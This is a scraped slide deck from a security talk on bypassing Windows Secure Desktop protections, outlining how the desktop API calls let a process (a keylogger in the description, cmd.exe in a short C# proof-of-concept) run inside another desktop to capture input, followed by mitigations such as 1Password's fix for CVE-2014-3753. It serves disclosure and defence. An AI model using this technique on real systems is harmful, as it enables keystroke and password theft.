agenda
play

Agenda Who Are We? Intro To Secure Desktop What is it? What - PowerPoint PPT Presentation

Dec 20, 2022 •356 likes •601 views

Bypassing Secure Desktops Protections Bruno Oliveira & Mrcio Almeida Agenda Who Are We? Intro To Secure Desktop What is it? What does it work? Windows API Our PoC Mitigation Conclusions Who are we?

  1. Bypassing Secure Desktops Protections Bruno Oliveira & Márcio Almeida ¡ ¡

  2. Agenda ① Who Are We? ② Intro To Secure Desktop – What is it? – What does it work? ③ Windows API ④ Our PoC ⑤ Mitigation ⑥ Conclusions

  3. Who are we? Don’t know you • Bruno Gonçalves de Oliveira – Senior SpiderLabs Security Consultant – MSc Candidate – Offensive Security – Talks at AppSec USA 14, THOTCON, SOURCE Boston, Black Hat DC, SOURCE Barcelona, DEF CON, Hack In The Box, ToorCon, Ekoparty, YSTS & H2HC. • Márcio Almeida Macêdo – SpiderLabs Security Consultant – MSc Degree focusing in Web Applications Security – UFPE – Talks at Alligator Security Conference 2012 and 2013, YSTS, Ekoparty and Black Hat.

  4. Secure Desktop

  5. Secure Desktop What is it? • A way to protect against keystrokes sniffers. • A new desktop created from the *original* one that should isolate the application. • Only accessed with SYSTEM privileges.

  6. Secure Desktop How does it work? • It is utilized the functions from Desktop objects (Windows API) to create the new desktop. • It is only accessed with SYSTEM privileges.

  7. Demo 1 How SD works?

  8. Demo 2 Injecting payload on process

  9. Demo 3 Courtesy Shell – VNC Payload

  10. Windows API

  11. Desktop Functions (user32.dll) MSDN • CloseDesktop • CreateDesktop • EnumDesktops • GetThreadDesktop • OpenDesktop • OpenInputDesktop • SetThreadDesktop • SwitchDesktop h#p://msdn.microso0.com/en-­‑us/library/windows/desktop/ms687107(v=vs.85).aspx ¡

  12. Sessions, Windows Stations and Desktops Windows API Session ¡0 ¡ Windows ¡StaHon ¡ Desktop ¡ Another ¡ ApplicaHon ¡ ApplicaHon ¡

  13. What the Applications do? Windows API Session ¡0 ¡ Windows ¡StaHon ¡ Desktop ¡ Secure ¡Desktop ¡ Another ¡ … ¡ ApplicaHon ¡ ApplicaHon ¡ User ¡Input ¡

  14. Our Attack Windows API Session ¡0 ¡ Windows ¡StaHon ¡ Desktop ¡ Secure ¡Desktop ¡ Another ¡ KeyLogger ¡ … ¡ Windows ¡API ¡ ApplicaHon ¡ Process ¡ ApplicaHon ¡ User ¡Input ¡

  15. Attack Details Proof-Of-Concept • Utilizing OpenDesktop (user32.dll) function request the desktop to be opened. • Utilizing SetThreadDesktop (user32.dll) get access to desktop. • Utilizing CreateProcess (kernel32.dll) Start a KeyLogger process into this desktop. • Get the user input via the KeyLogger process into the “Secured Desktop”.

  16. Proof-Of-Concept Source Code 1. ¡staHc ¡void ¡Main(string[] ¡args) ¡{ ¡ 2. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡IntPtr ¡hNewDesktop; ¡ 3. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡while ¡(true) ¡ 4. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 5. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡foreach ¡(string ¡desktop ¡in ¡GetDesktops()) ¡ 6. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 7. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡if ¡(!hasP0wn3d(desktop)) ¡ 8. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 9. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ 10. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡hNewDesktop ¡= ¡Open(desktop); ¡ 11. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Task.Factory.StartNew(() ¡=> ¡ 12. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 13. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡SetThreadDesktop(hNewDesktop); ¡ 14. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡CreateProcess("c:\\windows\\system32\\cmd.exe", ¡desktop); ¡ 15. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡}).Wait(); ¡ 16. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡_p0wn3d_desktops.Add(desktop); ¡ 17. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡ 18. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡ 19. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡ 20. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡

  17. DEMO 4 Proof of Concept

  18. Mitigation

  19. Session Isolation Windows API Session ¡0 ¡ Session ¡1 ¡ Windows ¡StaHon ¡ Windows ¡StaHon ¡ Desktop ¡ Desktop ¡ Another ¡ Processes ¡ ApplicaHon ¡ ApplicaHon ¡ User ¡Input ¡

  20. Solution Adopted by 1Password (CVE-2014-3753)

  21. Solution Adopted by 1Password CVE-2014-3753 Detect ¡if ¡the ¡1Password ¡is ¡the ¡unique ¡process/program ¡running ¡ ¡ into ¡the ¡Secure ¡Desktop ¡and ¡if ¡isn’t ¡close ¡the ¡desktop ¡and ¡alert ¡ ¡ the ¡user. ¡

  22. Conclusions

  23. THANK YOU ¡ ¡

Recommend

R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1

R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1

Annual General Meeting of Shareholders No. 1/2015 28 January 2015 At 1.30 P.M. at Athenee Crystal Hall, 3rd Floor, Plaza Athenee Bangkok R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1 To certify

879 views • 54 slides
Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions

Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions

Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions Introductions 1) Negotiation Characteristics 2) Approaches to Conflict 2) Approaches to Conflict 3) Issues, Positions, and Interests 4)

1.06k views • 60 slides
Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda

Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda

Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda (Lecture) Web Engineering Process W b E i i P Agenda (Lab) Agenda (Lab) Web 2.0 architecture patterns Project proposal P j t l

1.06k views • 19 slides
Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements

Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements

Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements Compliance Plan Upgrade Issues Questions Introduction Introduction Introduction Danny Luong Senior Enforcement Manager Background

989 views • 29 slides
Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item

Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item

Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item Led by 14:15 TEA & COFFEE BREAK 11.00 Introduction Carolyn McCall 11.05 1. Market / Network 14.30 4. Making travel easy & affordable

1.22k views • 90 slides
Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda Overview 2. Public Comment (items not on the agenda) 3. CAG Questions and Concerns (items not on the agenda) 4. Labor Issue Update 5. New Generation

1.22k views • 55 slides
Agenda TOSITA Agenda July 15, 2015 9:30 - 10:00: Registration 10:00 -10:10: Welcome- PECO

Agenda TOSITA Agenda July 15, 2015 9:30 - 10:00: Registration 10:00 -10:10: Welcome- PECO

Agenda TOSITA Agenda July 15, 2015 9:30 - 10:00: Registration 10:00 -10:10: Welcome- PECO Perspective Bill Patterer -PECO 10:10- 10:20: Workshop Agenda/ EP-ACT Intro/EV overview Tony Bandiero EP-ACT 10:20- 10:35: EVSEs - What are They?

291 views • 15 slides
Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher,

Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher,

2/21/18 Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher, O.F.M. Cap. (St. Pius X Church) Kim Ranell Newgass (Baptist Church in New Haven) Mary Lou Freitas (Bethany Covenant) Doris

508 views • 5 slides
Mississauga Halton LHIN CSS and MH&A Sector Meeting June 11, 2010 Agenda Agenda Welcome

Mississauga Halton LHIN CSS and MH&A Sector Meeting June 11, 2010 Agenda Agenda Welcome

Mississauga Halton LHIN CSS and MH&A Sector Meeting June 11, 2010 Agenda Agenda Welcome and Agenda Community Care Information Management Program Herb Spence Stakeholder Engagement, HRIS (CCIM) Eugene Cortes - Project Lead,

2.11k views • 122 slides
Welcome June 2020 Agenda I. Welcome and Introductions II. Consent Agenda a. Approval of June

Welcome June 2020 Agenda I. Welcome and Introductions II. Consent Agenda a. Approval of June

Welcome June 2020 Agenda I. Welcome and Introductions II. Consent Agenda a. Approval of June Agenda b. Approval of February minutes c. Women in Jail Research Study III. Old Business a. JRAC Membership b. COVID-19 Strategies and Sustainability

539 views • 26 slides
Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August

Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August

Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August 17 & 18, 2021 10th Annual Nation to Nation Consultation Host: Chickasaw Nation USDA Leadership & Tribal Leaders Oklahoma NRCS

892 views • 65 slides
E-beam and X-ray: Why? What? How? 1 Introduction & Agenda Agenda: We are investing to

E-beam and X-ray: Why? What? How? 1 Introduction & Agenda Agenda: We are investing to

E-beam and X-ray: Why? What? How? 1 Introduction & Agenda Agenda: We are investing to supply and service a growing market E-Beam and X-ray are complementary solution that are financially viable Mevex and IBA are there to help

198 views • 15 slides
Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step

Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step

Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step Communication Process Your Role Next Steps Centers Purpose Centers Purpose Centers Purpose Centers Purpose We are an

744 views • 55 slides
IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910:

IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910:

IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910: Introduction to the IDN revision - John Klensin - An orientation on the main goals of the revision - Explanation of the division of labor between

233 views • 10 slides
#EdSummit @MorenoValleyUSD @BarrCenter 1 Agenda 10:45 Agenda 10:45 - 11:30 am 11:30 am

#EdSummit @MorenoValleyUSD @BarrCenter 1 Agenda 10:45 Agenda 10:45 - 11:30 am 11:30 am

#EdSummit @MorenoValleyUSD @BarrCenter 1 Agenda 10:45 Agenda 10:45 - 11:30 am 11:30 am 10:45 - 10:50 am: Introductions 10:50 - 10:55 am: MVUSD Board President Susan Smith 10:55 - 11:00 am: MVUSD Superintendent Dr. Martinrex Kedziora

408 views • 21 slides
Agenda Item 4: PUBLIC COMMENT Individuals may speak on any topic for up to three minutes; during

Agenda Item 4: PUBLIC COMMENT Individuals may speak on any topic for up to three minutes; during

4/25/19 SA SAN F FRANCISQ SQUITO C CREEK S F C J PA . O R G J O I N T P O W E R S A U T H O R I T Y BOARD OF DIRECTORS MEETING Menlo Park City Council Chambers April 25, 2019 at 2:30 p.m. AGENDA 1. ROLL CALL 2. APPROVAL OF AGENDA 3.

158 views • 15 slides
Community Advisory Group Meeting September 3, 2014 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting September 3, 2014 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting September 3, 2014 Agenda 1. Welcome, Introductions and Agenda Overview 2. Public Comment (items not on the agenda) 3. CAG Questions and Concerns 4. UCSF Medical Center Update 5. UCSF 10-Year Capital Plan

941 views • 35 slides
http://windowstips.wordpress.com Agenda Agenda Introduction Malware public information

http://windowstips.wordpress.com Agenda Agenda Introduction Malware public information

Juan Garrido MVP Enterprise Security @tr1ana http://windowstips.wordpress.com Agenda Agenda Introduction Malware public information TRIANA Conclusions Agenda One new malware every 2 seconds Its like epidemic Many variety of

1.07k views • 19 slides
F F unctional Design unctional Design We e k 9 Agenda (Lecture) Agenda (Lecture)

F F unctional Design unctional Design We e k 9 Agenda (Lecture) Agenda (Lecture)

F F unctional Design unctional Design We e k 9 Agenda (Lecture) Agenda (Lecture) Functional design F ti l d i Agenda (Lab) Agenda (Lab) Weekly progress report Homework/Lab assignments Announcement Announcement Walk

478 views • 24 slides
Community Advisory Group Meeting December 3, 2014 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting December 3, 2014 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting December 3, 2014 Agenda 1. Welcome, Introductions and Agenda Overview 2. Public Comment (Items not on the agenda) 3. CAG Questions and Concerns 4. Overview of UCSF Diversity Programs 5. Campus Updates

539 views • 22 slides
Spring 2015 Agenda - Thursday Logistics Introductions Agenda Bash Network Updates

Spring 2015 Agenda - Thursday Logistics Introductions Agenda Bash Network Updates

Southern Crossroads (SoX) Participant Meeting Spring 2015 Agenda - Thursday Logistics Introductions Agenda Bash Network Updates Commodity Internet SoX NOC NSF Workshops Brainstorming over Dinner Agenda - Friday

554 views • 32 slides
RAF Marham October 2019 Kayleigh Winter MOD Development Manager Agenda Agenda About the IET

RAF Marham October 2019 Kayleigh Winter MOD Development Manager Agenda Agenda About the IET

RAF Marham October 2019 Kayleigh Winter MOD Development Manager Agenda Agenda About the IET Membership and Benefits Professional Registration My approach Application and Support How I can add value Q&A Agenda About the IET The

683 views • 49 slides
PCCD Planning and Budgeting Council May 27, 2016 8:30 a.m. 12:30 p.m. AGENDA Time Agenda

PCCD Planning and Budgeting Council May 27, 2016 8:30 a.m. 12:30 p.m. AGENDA Time Agenda

PCCD Planning and Budgeting Council May 27, 2016 8:30 a.m. 12:30 p.m. AGENDA Time Agenda Topic 2015- 16 PBC Goal PCCD 2015- 16 Strategic Presenters Goals and Institutional Objectives 8:30 I. Agenda Review Facilitator 8:35

371 views • 35 slides
an industry perspective AGENDA AGENDA ATDIs Activities on EMF EMF in 5G Environment Topics

an industry perspective AGENDA AGENDA ATDIs Activities on EMF EMF in 5G Environment Topics

EMF Exposure and 5G network development: an industry perspective AGENDA AGENDA ATDIs Activities on EMF EMF in 5G Environment Topics for Discussion AGENDA ATDIs activities on EMF ATDI as a Sector Member of the ITU-D, ITU-R WTDC- 17

316 views • 13 slides

More recommend